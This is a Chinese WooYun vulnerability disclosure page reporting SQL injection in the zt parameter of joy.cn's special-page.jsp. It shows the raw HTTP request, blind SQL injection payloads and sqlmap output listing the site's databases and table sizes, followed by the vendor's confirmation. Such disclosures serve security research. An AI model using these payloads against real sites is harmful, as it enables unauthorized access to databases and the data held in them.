当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122648

漏洞标题:激动网主站存在SQL注射漏洞

相关厂商:激动网

漏洞作者: 路人甲

提交时间:2015-06-25 11:28

修复时间:2015-08-09 11:38

公开时间:2015-08-09 11:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-25: 细节已通知厂商并且等待厂商处理中
2015-06-25: 厂商已经确认,细节仅向厂商公开
2015-07-05: 细节向核心白帽子及相关领域专家公开
2015-07-15: 细节向普通白帽子公开
2015-07-25: 细节向实习白帽子公开
2015-08-09: 细节向公众公开

简要描述:

RT

详细说明:

POST /special-page.jsp?zt=1 HTTP/1.1
Content-Length: 24
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.joy.cn/
Cookie: JSESSIONID=02DB3555D41D5B8EF0C67471ABD70DB5
Host: www.joy.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: */*
pageNum=1&saction=search

漏洞证明:

---
Parameter: zt (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: zt=-2879' OR 2165=2165 AND 'AUrp'='AUrp
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: zt=1' AND (SELECT * FROM (SELECT(SLEEP(5)))soje) AND 'KTia'='KTia
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
available databases [4]:
[*] information_schema
[*] test
[*] wapcms
[*] waptranscode
Database: wapcms
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| reader_statistics_data            | 12456775 |
| reader_voteresult_data            | 10085592 |
| reader_system_log                 | 5855412 |
| reader_inter_vote_subitem         | 2567636 |
| reader_resource_video_suite       | 2087161 |
| reader_order_user_house           | 1972867 |
| statistics_url_hour_data_report   | 1765332 |
| reader_resource_p_res_info        | 1004886 |
| statistics_url_data_report        | 961519  |
| reader_resource_all               | 230662  |
| reader_resource_video             | 221989  |
| reader_inter_msgrecord            | 192016  |
| reader_resource_restype           | 165123  |
| statistics_ip_report              | 145163  |
| reader_video_targetfile_status    | 90159   |
| reader_statistics_url_config_auth | 75085   |
| reader_video_hot_comment          | 53641   |
| reader_bussiness_column           | 48737   |
| temp_dxn_type                     | 37545   |
| temp_dxn_file                     | 37450   |
| temp_dxn_resource                 | 31594   |
| reader_resource_material          | 29651   |
| wo_push                           | 28767   |
| reader_inter_msglog               | 28073   |
| wo_video                          | 21750   |
| reader_video_task_targetfile      | 18328   |
| reader_ios_token                  | 17283   |
| reader_system_ipinfo_20111207     | 11836   |
| reader_bussiness_template         | 9550    |
| reader_resource_info              | 8700    |
| reader_inter_vote_item            | 5177    |
| reader_resource_pack_fee          | 4339    |
| reader_system_keyword             | 3914    |
| reader_video_task_file            | 3842    |
| reader_push_message               | 2462    |
| temp_dxn_suite                    | 2298    |
| reader_statistics_url_config      | 1989    |
| reader_resource_author            | 1772    |
| ugc_user                          | 1489    |
| reader_comment_user               | 1447    |
| rank_third                        | 1260    |
| reader_inter_vote                 | 1245    |
| reader_offline_log                | 1175    |
| reader_system_ipinfo20110416      | 1069    |
| reader_system_ipinfo20100723      | 890     |
| reader_user_points_record         | 770     |
| temp_dxn_suite1                   | 766     |
| reader_resource_type              | 740     |
| reader_video_task                 | 657     |
| reader_system_roles_privileges    | 596     |
| media                             | 588     |
| reader_tag_template               | 478     |
| statistics_url_config_group_rel   | 430     |
| reader_statistics_access_log      | 419     |
| reader_adapter_comadapterrule     | 400     |
| reader_system_users_groups        | 324     |
| reader_tag_userdef                | 281     |
| reader_system_ipinfo              | 256     |
| reader_adapter_adapterrule        | 244     |
| reader_adapter_adapter            | 221     |
| video_news                        | 182     |
| reader_system_users_roles         | 139     |
| reader_useragent_ua               | 133     |
| reader_system_variables           | 117     |
| reader_tag_sys                    | 117     |
| reader_bussiness_packgroup        | 102     |
| reader_useragent_ua_g_u           | 102     |
| reader_system_user                | 101     |
| reader_system_privilege           | 90      |
| reader_system_menu                | 79      |
| reader_resource_material_cata     | 62      |
| statplaytop                       | 60      |
| reader_resource_ebook_chapter     | 50      |
| reader_activity_join_record       | 45      |
| pic_news                          | 32      |
| reader_ad_info                    | 26      |
| reader_system_role                | 18      |
| reader_bussiness_tem_catalog      | 17      |
| reader_activity_videos            | 15      |
| reader_useragent_ua_group         | 15      |
| statistics_url_config_group       | 15      |
| reader_statistics_data_report     | 11      |
| reader_system_group               | 11      |
| reader_bussiness_tem_default      | 10      |
| reader_inter_msgboard             | 8       |
| user_info                         | 8       |
| reader_adapter_type               | 7       |
| reader_bussiness_tem_type         | 6       |
| reader_actiivty_award_user        | 5       |
| reader_statistics_channel         | 5       |
| reader_activity                   | 4       |
| reader_focus_pic                  | 4       |
| special_mgr                       | 4       |
| reader_partner_channel_child      | 3       |
| reader_resource_ebook_tome        | 3       |
| reader_resource_referen           | 2       |
| reader_video_transcode_server     | 2       |
| reader_bussiness_pg_area          | 1       |
| reader_bussiness_product          | 1       |
| reader_fee_fee                    | 1       |
| reader_partner_channel            | 1       |
| reader_partner_spcp               | 1       |
| reader_system_keyword_type        | 1       |
| reader_video_cover                | 1       |
| reader_vote_item_custom           | 1       |
+-----------------------------------+---------+

修复方案:

修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-06-25 11:36

厂商回复:

谢谢!

最新状态:

暂无